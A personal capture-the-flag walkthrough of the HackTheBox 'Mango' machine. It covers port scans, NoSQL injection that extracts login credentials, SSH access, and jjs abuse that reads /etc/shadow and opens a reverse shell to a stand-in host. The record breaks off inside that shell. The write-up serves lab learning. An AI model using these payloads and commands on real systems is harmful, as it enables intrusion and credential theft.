This HackTheBox machine was one of the first attempts that fully relied on a web application and no CMS involved. Personally, webapp security is a realm I’ve felt to be my weakest so it was definitely a challenge for me to try it and gain access to the host. Unfortunately, not much of resources I can share as reference other than the ones below.
Just like my other walkthroughs, I hope this one is as enjoyable.
References
Let’s begin!
Initial Enumeration: Footprinting and Scanning
First of, we need to identify how to reach the system. In other words, we need to identify what are the services available from this machine.
Let's start by adding this machine's IP address to the hosts file and create an alias:
My go-to tools in this phase, which are typically used by many to start enumerating, are:
masscan: very nice port scanning tool that allows finding open ports quickly. To me this is a tool to narrow down the scope of the enumeration so we can focus on open ports only when using nmap.
Here, I am designating the interface to use when communicating to the HTB machine (-e) which will be the HTB VPN interface, along with -p to designate the port range to target but I will target ALL TCP and UDP Ports, and the transmission rate of packets per second (--rate). Similar to this, you could also run something like this:
nmap -p- --min-rate=1000 -T4
nmap: I think most people in the information technology and security space know what nmap does. It is a very versatile Port scanning tool which also allows you to use scripts to further target the services found. Just like anything, it can be a useful tool while it can also be damaging if the user is not careful.
What I typically start with when using nmap is:
-sC: to use all default non-intrusive nmap scripts on each service
-sV: to get the service version information which is definitely important for us
-p: to designate the port we will be targeting
-vvvv: for extended verbosity (as I like as many details as I can get)
MASSCAN
root@kali:~/Documents/HTB-Labs/Mango# masscan -e tun1 -p1-65535,U:1-65535 10.10.10.162 --rate=1000
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-01-15 02:23:01 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 443/tcp on 10.10.10.162
Discovered open port 22/tcp on 10.10.10.162
Discovered open port 80/tcp on 10.10.10.162
As you can see, we only found some basic ports; basically two of them are for HTTP/HTTPS traffic and SSH. Let’s Inspect them further with nmap.
root@kali:~/Documents/HTB-Labs/Mango# nmap -sC -sV -vvv -p22,80,443 -oX Mango_TCP.xml -oN Mango-TCP.log mango.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-14 21:29 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:29
Completed NSE at 21:29, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:29
Completed NSE at 21:29, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:29
Completed NSE at 21:29, 0.00s elapsed
Initiating Ping Scan at 21:29
Scanning mango.htb (10.10.10.162) [4 ports]
Completed Ping Scan at 21:29, 0.16s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 21:29
Scanning mango.htb (10.10.10.162) [3 ports]
Discovered open port 443/tcp on 10.10.10.162
Discovered open port 22/tcp on 10.10.10.162
Discovered open port 80/tcp on 10.10.10.162
Completed SYN Stealth Scan at 21:29, 0.15s elapsed (3 total ports)
Initiating Service scan at 21:29
Scanning 3 services on mango.htb (10.10.10.162)
Completed Service scan at 21:29, 12.77s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against mango.htb (10.10.10.162)
Retrying OS detection (try #2) against mango.htb (10.10.10.162)
Initiating Traceroute at 21:29
Completed Traceroute at 21:29, 0.13s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 21:29
Completed Parallel DNS resolution of 2 hosts. at 21:29, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
NSE: Script scanning 10.10.10.162.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:29
Completed NSE at 21:29, 5.55s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:29
Completed NSE at 21:29, 1.08s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:29
Completed NSE at 21:29, 0.00s elapsed
Nmap scan report for mango.htb (10.10.10.162)
Host is up, received echo-reply ttl 63 (0.12s latency).
Scanned at 2020-01-14 21:29:24 EST for 24s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDXYCdNRHET98F1ZTM+H8yrD9KXeRjvIk9e78JkHdzcqCq6zcvYIqEZReb3FSCChJ9mxK6E6vu5xBY7R6Gi0V31dx0koyaieEMd67PU+9UcjaAujbDS3UgYzySN+c5GV/ssmA6wWHu4zz+k+qztqdYFPh0/TgrC/wNPWHOKdpivgoyk3+F/retyGdKUNGjypXrw6v1faHiLOIO+zNHorxB304XmSLEFswiOS8UsjplIbud2KhWPEkY4s4FyjlpfpVdgPljbjijm7kcPNgpTXLXE51oNE3Q5w7ufO5ulo3Pqm0x+4d+SEpCE4g0+Yb020zK+JlKsp2tFJyLqTLan1buN
| 256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDqSZ4iBMzBrw2lEFKYlwO2qmw0WPf76ZhnvWGK+LJcHxvNa4OQ/hGuBWCjVlTcMbn1Te7D8jGwPgbcVpuaEld8=
| 256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB1sFdLYacK+1f4J+i+NCAhG+bj8xzzydNhqA1Ndo/xt
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open ssl/ssl syn-ack ttl 63 Apache httpd (SSL-only mode)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN/localityName=None/emailAddress=admin@mango.htb/organizationalUnitName=None
| Issuer: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN/localityName=None/emailAddress=admin@mango.htb/organizationalUnitName=None
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-09-27T14:21:19
| Not valid after: 2020-09-26T14:21:19
| MD5: b797 d14d 485f eac3 5cc6 2fed bb7a 2ce6
| SHA-1: b329 9eca 2892 af1b 5895 053b f30e 861f 1c03 db95
| -----BEGIN CERTIFICATE-----
| MIIEAjCCAuqgAwIBAgIJAK5QiSmoBvEyMA0GCSqGSIb3DQEBCwUAMIGVMQswCQYD
| VQQGEwJJTjENMAsGA1UECAwETm9uZTENMAsGA1UEBwwETm9uZTEXMBUGA1UECgwO
| TWFuZ28gUHJ2IEx0ZC4xDTALBgNVBAsMBE5vbmUxIDAeBgNVBAMMF3N0YWdpbmct
| b3JkZXIubWFuZ28uaHRiMR4wHAYJKoZIhvcNAQkBFg9hZG1pbkBtYW5nby5odGIw
| HhcNMTkwOTI3MTQyMTE5WhcNMjAwOTI2MTQyMTE5WjCBlTELMAkGA1UEBhMCSU4x
| DTALBgNVBAgMBE5vbmUxDTALBgNVBAcMBE5vbmUxFzAVBgNVBAoMDk1hbmdvIFBy
| diBMdGQuMQ0wCwYDVQQLDAROb25lMSAwHgYDVQQDDBdzdGFnaW5nLW9yZGVyLm1h
| bmdvLmh0YjEeMBwGCSqGSIb3DQEJARYPYWRtaW5AbWFuZ28uaHRiMIIBIjANBgkq
| hkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5fimSfgq3xsdUkZ6dcbqGPDmCAJJBOK2
| f5a25At3Ht5r1SjiIuvovDSmMHjVmlbF6qX7C6f7Um+1Vtv/BinZfpuMEesyDH0V
| G/4X5r6o1GMfrvjvAXQ2cuVEIxHGH17JM6gKKEppnguFwVMhC4/KUIjuaBXX9udA
| 9eaFJeiYEpdfSUVysoxQDdiTJhwyUIPnsFrf021nVOI1/TJkHAgLzxl1vxrMnwrL
| 2fLygDt1IQN8UhGF/2UTk3lVfEse2f2kvv6GbmjxBGfWCNA/Aj810OEGVMiS5SLr
| arIXCGVl953QCD9vi+tHB/c+ICaTtHd0Ziu/gGbdKdCItND1r9kOEQIDAQABo1Mw
| UTAdBgNVHQ4EFgQUha2bBOZXo4EyfovW+pvFLGVWBREwHwYDVR0jBBgwFoAUha2b
| BOZXo4EyfovW+pvFLGVWBREwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQsF
| AAOCAQEAmyhYweHz0az0j6UyTYlUAUKY7o/wBHE55UcekmWi0XVdIseUxBGZasL9
| HJki3dQ0mOEW4Ej28StNiDKPvWJhTDLA1ZjUOaW2Jg20uDcIiJ98XbdBvSgjR6FJ
| JqtPYnhx7oOigKsBGYXXYAxoiCFarcyPyB7konNuXUqlf7iz2oLl/FsvJEl+YMgZ
| YtrgOLbEO6/Lot/yX9JBeG1z8moJ0g+8ouCbUYI1Xcxipp0Cp2sK1nrfHEPaSjBB
| Os2YQBdvVXJau7pt9zJmPVMhrLesf+bW5CN0WpC/AE1M1j6AfkX64jKpIMS6KAUP
| /UKaUcFaDwjlaDEvbXPdwpmk4vVWqg==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.18 (94%), Linux 3.16 (93%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 2.6.32 (92%), Linux 3.11 (92%), Linux 3.7 - 3.10 (92%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.80%E=4%D=1/14%OT=22%CT=%CU=31261%PV=Y%DS=2%DC=T%G=N%TM=5E1E791C%P=x86_64-pc-linux-gnu)
SEQ(SP=FE%GCD=1%ISR=102%TI=Z%CI=Z%II=I%TS=A)
OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)
WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)
ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 42.933 days (since Mon Dec 2 23:06:06 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=253 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 124.42 ms 10.10.14.1
2 119.18 ms mango.htb (10.10.10.162)
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:29
Completed NSE at 21:29, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:29
Completed NSE at 21:29, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:29
Completed NSE at 21:29, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.57 seconds
Raw packets sent: 61 (4.280KB) | Rcvd: 43 (3.180KB)
From the port scan, we found HTTP is available but we get a HTTP 403 status code which means we are forbidden from accessing http://mango.htb. At the same time, HTTPS service gives us the certificate information showing a different CN from just mango.htb, that being staging-order.mango.htb. We now need to enumerate both mango.htb, and also add staging-order.mango.htb into the hosts file to then enumerate it as well.
Using curl on http://mango.htb gives us the same HTTP 403 status code we got through nmap which confirms at the moment going to HTTPS is the way to go. But before we move forward it’s worth elaborating on the fact that both HTTP and HTTPS services in this host support the following HTTP method:
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
With -X GET, we can specify the type of HTTP Request and the extra verbosity always comes in handy. Note to self: as curl tell us, using -X with GET is inferred, but defining the actual HTTP method I want to use is something I always like to show for my own reference.
root@kali:~/Documents/HTB-Labs/Mango# curl -v -X GET http://mango.htb
Note: Unnecessary use of -X or --request, GET is already inferred.
* Trying 10.10.10.162:80...
* TCP_NODELAY set
* Connected to mango.htb (10.10.10.162) port 80 (#0)
> GET / HTTP/1.1
> Host: mango.htb
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 403 Forbidden
< Date: Sun, 31 May 2020 02:54:08 GMT
< Server: Apache/2.4.29 (Ubuntu)
< Content-Length: 274
< Content-Type: text/html; charset=iso-8859-1
<
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at mango.htb Port 80</address>
</body></html>
* Connection #0 to host mango.htb left intact
Now let's sample what's in HTTPS. We need to use -k to access the site insecurely, or ignoring the certificate verification as we cannot validate the signer, and simply focus on what the verbose and what the HTTP HEAD method gives us.
Similar to using -X GET, we could use -I when using curl with the HTTP HEAD method but like I said, I like showing the method I’m using for my own reference.
root@kali:~/Documents/HTB-Labs/Mango# curl -v -X HEAD -k https://mango.htb
Warning: Setting custom HTTP method to HEAD with -X/--request may not work the
Warning: way you want. Consider using -I/--head instead.
* Trying 10.10.10.162:443...
* TCP_NODELAY set
* Connected to mango.htb (10.10.10.162) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
* CAfile: /etc/ssl/certs/ca-certificates.crt
CApath: /etc/ssl/certs
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* TLSv1.3 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
* ALPN, server accepted to use http/1.1
* Server certificate:
* subject: C=IN; ST=None; L=None; O=Mango Prv Ltd.; OU=None; CN=staging-order.mango.htb; emailAddress=admin@mango.htb
* start date: Sep 27 14:21:19 2019 GMT
* expire date: Sep 26 14:21:19 2020 GMT
* issuer: C=IN; ST=None; L=None; O=Mango Prv Ltd.; OU=None; CN=staging-order.mango.htb; emailAddress=admin@mango.htb
* SSL certificate verify result: self signed certificate (18), continuing anyway.
> HEAD / HTTP/1.1
> Host: mango.htb
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sun, 31 May 2020 02:19:31 GMT
< Server: Apache/2.4.29 (Ubuntu)
< Content-Type: text/html; charset=UTF-8
* no chunk, no close, no size. Assume close to signal end
<
* TLSv1.2 (IN), TLS alert, close notify (256):
* Closing connection 0
* TLSv1.2 (OUT), TLS alert, close notify (256):
Adding staging-order did not reveal anything but going to the /analytics.php page from mango.htb shows a system interface where it is possible to upload a payload. Even though it looked like it would allow uploads using the file formats json, js, and xml, this route also did not work and is more of a rabbithole, so for the sake of this write-up I will simply skip this.
If we look back at what was found in our port scanning phase, we can see HTTP is open flagged as a 403 Forbidden when used with mango.htb only as http://mango.htb. We also see that staging-order exists, based on the information found in the certificate, why don't we try accessing http://staging-order.mango.htb/?
AND that worked!! We got an admin login page, but on a HTTP site?!
After attempting some basic SQLi to bypass authentication which ended up as a waste of time, I had to seek further clues from other members in the HTB Forum and someone brought up the possibility of the name of the site Is a clue itself and nothing specific to mangoes. This made me think if ”Mango” and ”Mongo” from mongoDB could be related.
Exploitation and Gaining Access
As we only have two inputs to interact with the site, SQL injection seems to be The most logical approach, and from the name guessing mentioned earlier I had some reading to do.
Something I had not realized which I found from my research is the fact that MongoDB is based on NoSQL, and this research led me to find a way to do a 'nosql injection' as MongoDB is a nosql database.
This basically pointed me to a nosqli exploit that can dump usernames and passwords which we can try; a link was provided in the overview section as reference.
NOSQL USER-PASS ENUM SCRIPT
root@kali:~/Documents/HTB-Labs/Mango# python3 nosqli-user-pass-enum.py -u http://staging-order.mango.htb -m POST -up username -pp password -op login:login -ep username
No pattern starts with '0'
No pattern starts with '1'
No pattern starts with '2'
No pattern starts with '3'
No pattern starts with '4'
No pattern starts with '5'
No pattern starts with '6'
No pattern starts with '7'
No pattern starts with '8'
No pattern starts with '9'
Pattern found that starts with 'a'
Pattern found: ad
Pattern found: adm
Pattern found: admi
Pattern found: admin
username found: admin
No pattern starts with 'b'
No pattern starts with 'c'
No pattern starts with 'd'
No pattern starts with 'e'
No pattern starts with 'f'
No pattern starts with 'g'
No pattern starts with 'h'
No pattern starts with 'i'
No pattern starts with 'j'
No pattern starts with 'k'
No pattern starts with 'l'
Pattern found that starts with 'm'
Pattern found: ma
Pattern found: man
Pattern found: mang
Pattern found: mango
username found: mango
No pattern starts with 'n'
No pattern starts with 'o'
No pattern starts with 'p'
No pattern starts with 'q'
No pattern starts with 'r'
No pattern starts with 's'
No pattern starts with 't'
No pattern starts with 'u'
No pattern starts with 'v'
No pattern starts with 'w'
No pattern starts with 'x'
No pattern starts with 'y'
No pattern starts with 'z'
No pattern starts with 'A'
No pattern starts with 'B'
No pattern starts with 'C'
No pattern starts with 'D'
No pattern starts with 'E'
No pattern starts with 'F'
No pattern starts with 'G'
No pattern starts with 'H'
No pattern starts with 'I'
No pattern starts with 'J'
No pattern starts with 'K'
No pattern starts with 'L'
No pattern starts with 'M'
No pattern starts with 'N'
No pattern starts with 'O'
No pattern starts with 'P'
No pattern starts with 'Q'
No pattern starts with 'R'
No pattern starts with 'S'
No pattern starts with 'T'
No pattern starts with 'U'
No pattern starts with 'V'
No pattern starts with 'W'
No pattern starts with 'X'
No pattern starts with 'Y'
No pattern starts with 'Z'
No pattern starts with '!'
No pattern starts with '"'
No pattern starts with '#'
No pattern starts with '%'
No pattern starts with '''
No pattern starts with '('
No pattern starts with ')'
No pattern starts with ','
No pattern starts with '-'
No pattern starts with '/'
No pattern starts with ':'
No pattern starts with ';'
No pattern starts with '<'
No pattern starts with '='
No pattern starts with '>'
No pattern starts with '@'
No pattern starts with '['
No pattern starts with ']'
No pattern starts with '_'
No pattern starts with '`'
No pattern starts with '{'
No pattern starts with '}'
No pattern starts with '~'
No pattern starts with ' '
No pattern starts with ' '
No pattern starts with '
'
'o pattern starts with '
No pattern starts with '
'
No pattern starts with '
'
2 username(s) found:
admin
mango
AND we got me some usernames. Now let's try the same but using -ep password switch:
root@kali:~/Documents/HTB-Labs/Mango# python3 nosqli-user-pass-enum.py -u http://staging-order.mango.htb -m POST -up username -pp password -op login:login -ep password
No pattern starts with '0'
No pattern starts with '1'
No pattern starts with '2'
No pattern starts with '3'
No pattern starts with '4'
No pattern starts with '5'
No pattern starts with '6'
No pattern starts with '7'
No pattern starts with '8'
No pattern starts with '9'
No pattern starts with 'a'
No pattern starts with 'b'
No pattern starts with 'c'
No pattern starts with 'd'
No pattern starts with 'e'
No pattern starts with 'f'
No pattern starts with 'g'
Pattern found that starts with 'h'
Pattern found: h3
Pattern found: h3m
Pattern found: h3mX
Pattern found: h3mXK
Pattern found: h3mXK8
Pattern found: h3mXK8R
Pattern found: h3mXK8Rh
Pattern found: h3mXK8RhU
Pattern found: h3mXK8RhU~
Pattern found: h3mXK8RhU~f
Pattern found: h3mXK8RhU~f{
Pattern found: h3mXK8RhU~f{]
Pattern found: h3mXK8RhU~f{]f
Pattern found: h3mXK8RhU~f{]f5
Pattern found: h3mXK8RhU~f{]f5H
password found: h3mXK8RhU~f{]f5H
No pattern starts with 'i'
No pattern starts with 'j'
No pattern starts with 'k'
No pattern starts with 'l'
No pattern starts with 'm'
No pattern starts with 'n'
No pattern starts with 'o'
No pattern starts with 'p'
No pattern starts with 'q'
No pattern starts with 'r'
No pattern starts with 's'
Pattern found that starts with 't'
Pattern found: t9
Pattern found: t9K
Pattern found: t9Kc
Pattern found: t9KcS
Pattern found: t9KcS3
Pattern found: t9KcS3>
Pattern found: t9KcS3>!
Pattern found: t9KcS3>!0
Pattern found: t9KcS3>!0B
Pattern found: t9KcS3>!0B#
Pattern found: t9KcS3>!0B#2
password found: t9KcS3>!0B#2
No pattern starts with 'u'
No pattern starts with 'v'
No pattern starts with 'w'
No pattern starts with 'x'
No pattern starts with 'y'
No pattern starts with 'z'
No pattern starts with 'A'
No pattern starts with 'B'
No pattern starts with 'C'
No pattern starts with 'D'
No pattern starts with 'E'
No pattern starts with 'F'
No pattern starts with 'G'
No pattern starts with 'H'
No pattern starts with 'I'
No pattern starts with 'J'
No pattern starts with 'K'
No pattern starts with 'L'
No pattern starts with 'M'
No pattern starts with 'N'
No pattern starts with 'O'
No pattern starts with 'P'
No pattern starts with 'Q'
No pattern starts with 'R'
No pattern starts with 'S'
No pattern starts with 'T'
No pattern starts with 'U'
No pattern starts with 'V'
No pattern starts with 'W'
No pattern starts with 'X'
No pattern starts with 'Y'
No pattern starts with 'Z'
No pattern starts with '!'
No pattern starts with '"'
No pattern starts with '#'
No pattern starts with '%'
No pattern starts with '''
No pattern starts with '('
No pattern starts with ')'
No pattern starts with ','
No pattern starts with '-'
No pattern starts with '/'
No pattern starts with ':'
No pattern starts with ';'
No pattern starts with '<'
No pattern starts with '='
No pattern starts with '>'
No pattern starts with '@'
No pattern starts with '['
No pattern starts with ']'
No pattern starts with '_'
No pattern starts with '`'
No pattern starts with '{'
No pattern starts with '}'
No pattern starts with '~'
No pattern starts with ' '
No pattern starts with ' '
No pattern starts with '
'
'o pattern starts with '
No pattern starts with '
'
No pattern starts with '
'
2 password(s) found:
h3mXK8RhU~f{]f5H
t9KcS3>!0B#2
This worked just as good as with -ep username, and now we have both credential sets:
admin:h3mXK8RhU~f{]f5H
mango:t9KcS3>!0B#2
Now, one thing left to do is to attempt through HTTP and if successful, we can SSH as either one of the users.
After trying both users in the login page and successfully accessing an 'Under Plantation' internal page and also the same as admin, let's try with mango first through SSH:
root@kali:~/Documents/HTB-Labs/Mango# ssh mango@mango.htb
mango@mango.htb's password:
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Feb 11 04:59:56 UTC 2020
System load: 0.0 Processes: 99
Usage of /: 25.8% of 19.56GB Users logged in: 0
Memory usage: 14% IP address for ens33: 10.10.10.162
Swap usage: 0%
* Kata Containers are now fully integrated in Charmed Kubernetes 1.16!
Yes, charms take the Krazy out of K8s Kata Kluster Konstruction.
https://ubuntu.com/kubernetes/docs/release-notes
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
122 packages can be updated.
18 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Feb 11 04:56:51 2020 from 10.10.14.49
mango@mango:~$ pwd
/home/mango
mango@mango:~$ ls -al
total 28
drwxr-xr-x 4 mango mango 4096 Sep 28 15:27 .
drwxr-xr-x 4 root root 4096 Sep 27 14:02 ..
lrwxrwxrwx 1 mango mango 9 Sep 27 14:31 .bash_history -> /dev/null
-rw-r--r-- 1 mango mango 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 mango mango 3771 Apr 4 2018 .bashrc
drwx------ 2 mango mango 4096 Sep 28 15:27 .cache
drwx------ 3 mango mango 4096 Sep 28 15:27 .gnupg
-rw-r--r-- 1 mango mango 807 Apr 4 2018 .profile
mango@mango:~$ ls /home
admin mango
We are in the system as mango, but we don't find much other than two user home directories for both mango and admin users. Let's attempt and switch user to admin after seeing there is a user admin home directory:
mango@mango:~$ su - admin
Password:
$ /bin/bash
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
admin@mango:/home/admin$
And we are also in as admin. Let's keep going:
admin@mango:/home/admin$ ls -ltr
total 4
-r-------- 1 admin admin 33 Sep 27 14:29 user.txt
admin@mango:/home/admin$ cat user.txt
79bf3**********************47e92
AND we found the user.txt flag file; time to attempt Privilege Escalation!
Privilege Escalation
Now, let's try and see what is accessible by the user admin, like any globally executable binaries. As nothing else was outstanding on this host in terms of vulnerabilities to exploit, we must rely on enumeration.
Nothing stands out to be special other than /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs. As we look into GTFOBins, there is a way to run this as an interpreter just like python. Also, there is a way to do file reads, so we can also go this way and try to read any files owned by root and see if we are successful.
Keep in mind, the user admin does not have sudo rights to anything, so anything we do, we have to run it as a normal user.
admin@mango:/home/admin$ sudo -l
[sudo] password for admin:
Sorry, user admin may not run sudo on mango.
admin@mango:/home/admin$
As we try the file read approach with /etc/shadow, which only root and sudo users can read.
Successful Test
admin@mango:/home/admin$ echo 'var BufferedReader = Java.type("java.io.BufferedReader");
> var FileReader = Java.type("java.io.FileReader");
> var br = new BufferedReader(new FileReader("/etc/shadow"));
> while ((line = br.readLine()) != null) { print(line); }' | jjs
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> var BufferedReader = Java.type("java.io.BufferedReader");
jjs> var FileReader = Java.type("java.io.FileReader");
jjs> var br = new BufferedReader(new FileReader("/etc/shadow"));
jjs> while ((line = br.readLine()) != null) { print(line); }
root:$6$6uG5902N$XonoH4wyYV2f8.7fEVXLe03mLoH3r1lnJ59s2jTWTAV.qZKZH.CXYjCWuUG5gLnioLpSTBA3F1LXqQAOqdAJN/:18166:0:99999:7:::
daemon:*:17941:0:99999:7:::
bin:*:17941:0:99999:7:::
sys:*:17941:0:99999:7:::
sync:*:17941:0:99999:7:::
games:*:17941:0:99999:7:::
man:*:17941:0:99999:7:::
lp:*:17941:0:99999:7:::
mail:*:17941:0:99999:7:::
news:*:17941:0:99999:7:::
uucp:*:17941:0:99999:7:::
proxy:*:17941:0:99999:7:::
www-data:*:17941:0:99999:7:::
backup:*:17941:0:99999:7:::
list:*:17941:0:99999:7:::
irc:*:17941:0:99999:7:::
gnats:*:17941:0:99999:7:::
nobody:*:17941:0:99999:7:::
systemd-network:*:17941:0:99999:7:::
systemd-resolve:*:17941:0:99999:7:::
syslog:*:17941:0:99999:7:::
messagebus:*:17941:0:99999:7:::
_apt:*:17941:0:99999:7:::
lxd:*:17941:0:99999:7:::
uuidd:*:17941:0:99999:7:::
dnsmasq:*:17941:0:99999:7:::
landscape:*:17941:0:99999:7:::
pollinate:*:17941:0:99999:7:::
sshd:*:18166:0:99999:7:::
mango:$6$D9GOkLkh$Il/e.J35n8XniWWTWXPoXj0w.YwwVS2uAy5EHR8GoyZBoMj02sGSLXakk0nsCJS2v1SrWA6y.y2GCR3L/T5h41:18166:0:99999:7:::
admin:$6$Ls6eLFhb$XoRxrUPmgvjcZSoN1OnYWIlb7ALWvcaiK3MubdX99C08H1lWLfXDipAmqdRc6yikHUwaixBD/UnK/GhFx/tIY1:18166:0:99999:7:::
mongodb:*:18166:0:99999:7:::
jjs> admin@mango:/home/admin$
This basically means we can use jjs to read stuff owned by root. There is also a way to get a reverse shell by using the following sample:
export RHOST=attacker.com
export RPORT=12345
echo 'var host=Java.type("java.lang.System").getenv("RHOST");
var port=Java.type("java.lang.System").getenv("RPORT");
var ProcessBuilder = Java.type("java.lang.ProcessBuilder");
var p=new ProcessBuilder("/bin/bash", "-i").redirectErrorStream(true).start();
var Socket = Java.type("java.net.Socket");
var s=new Socket(host,port);
var pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){ while(pi.available()>0)so.write(pi.read()); while(pe.available()>0)so.write(pe.read()); while(si.available()>0)po.write(si.read()); so.flush();po.flush(); Java.type("java.lang.Thread").sleep(50); try {p.exitValue();break;}catch (e){}};p.destroy();s.close();' | jjs
But running it and expecting a reverse shell lead us nowhere as we ended in a reverse shell owned as admin and no privilege escalation happened:
root@kali:/home/root/Documents/HTB-Labs/Mango# nc -lnvp 12345
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::12345
Ncat: Listening on 0.0.0.0:12345
Ncat: Connection from 10.10.10.162.
Ncat: Connection from 10.10.10.162:35640.
bash-4.4$ pwd
pwd
/home/admin
bash-4.4$ id
id
